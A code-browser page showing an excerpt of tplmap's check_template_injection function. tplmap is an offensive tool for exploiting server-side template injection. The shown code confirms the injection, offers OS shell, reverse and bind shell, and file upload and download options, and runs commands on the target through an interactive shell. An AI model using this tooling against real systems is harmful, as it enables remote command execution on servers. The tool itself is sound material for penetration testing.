MCPcopy
hub / github.com/epinna/tplmap / check_template_injection

Function check_template_injection

core/checks.py:141–314  ·  view source on GitHub ↗
(channel)

Source from the content-addressed store, hash-verified

139 channel.inj_idx += 1
140
141def check_template_injection(channel):
142
143 current_plugin = detect_template_injection(channel)
144
145 # Kill execution if no engine have been found
146 if not channel.data.get('engine'):
147 log.fatal("""Tested parameters appear to be not injectable. Try to increase '--level' value to perform more tests.""")
148 return
149
150 # Print injection summary
151 _print_injection_summary(channel)
152
153 # If actions are not required, prints the advices and exit
154 if not any(
155 f for f,v in channel.args.items() if f in (
156 'os_cmd', 'os_shell', 'upload', 'download', 'tpl_shell', 'tpl_code', 'bind_shell', 'reverse_shell'
157 ) and v
158 ):
159
160 log.info(
161 """Rerun tplmap providing one of the following options:\n%(execute)s%(execute_blind)s%(bind_shell)s%(reverse_shell)s%(write)s%(read)s""" % (
162 {
163 'execute': '\n --os-shell\t\t\t\tRun shell on the target\n --os-cmd\t\t\t\tExecute shell commands' if channel.data.get('execute') and not channel.data.get('execute_blind') else '',
164 'execute_blind': '\n --os-shell\t\t\t\tRun shell on the target\n --os-cmd\t\t\tExecute shell commands' if channel.data.get('execute_blind') else '',
165 'bind_shell': '\n --bind-shell PORT\t\t\tConnect to a shell bind to a target port' if channel.data.get('bind_shell') else '',
166 'reverse_shell': '\n --reverse-shell HOST PORT\tSend a shell back to the attacker\'s port' if channel.data.get('reverse_shell') else '',
167 'write': '\n --upload LOCAL REMOTE\tUpload files to the server' if channel.data.get('write') else '',
168 'read': '\n --download REMOTE LOCAL\tDownload remote files' if channel.data.get('read') else '', }
169 )
170 )
171
172 return
173
174
175 # Execute operating system commands
176 if channel.args.get('os_cmd') or channel.args.get('os_shell'):
177
178 # Check the status of command execution capabilities
179 if channel.data.get('execute_blind'):
180 log.info("""Blind injection has been found and command execution will not produce any output.""")
181 log.info("""Delay is introduced appending '&& sleep <delay>' to the shell commands. True or False is returned whether it returns successfully or not.""")
182
183 if channel.args.get('os_cmd'):
184 print current_plugin.execute_blind(channel.args.get('os_cmd'))
185 elif channel.args.get('os_shell'):
186 log.info('Run commands on the operating system.')
187 Shell(current_plugin.execute_blind, '%s (blind) $ ' % (channel.data.get('os', ''))).cmdloop()
188
189 elif channel.data.get('execute'):
190 if channel.args.get('os_cmd'):
191 print current_plugin.execute(channel.args.get('os_cmd'))
192 elif channel.args.get('os_shell'):
193 log.info('Run commands on the operating system.')
194
195 Shell(current_plugin.execute, '%s $ ' % (channel.data.get('os', ''))).cmdloop()
196
197 else:
198 log.error('No system command execution capabilities have been detected on the target.')

Callers 1

test_detectionMethod · 0.90

Calls 12

ShellClass · 0.90
MultilineShellClass · 0.90
TcpServerClass · 0.90
_print_injection_summaryFunction · 0.85
getMethod · 0.80
execute_blindMethod · 0.80
executeMethod · 0.80
readMethod · 0.80
writeMethod · 0.80
bind_shellMethod · 0.80
reverse_shellMethod · 0.80

Tested by 1

test_detectionMethod · 0.72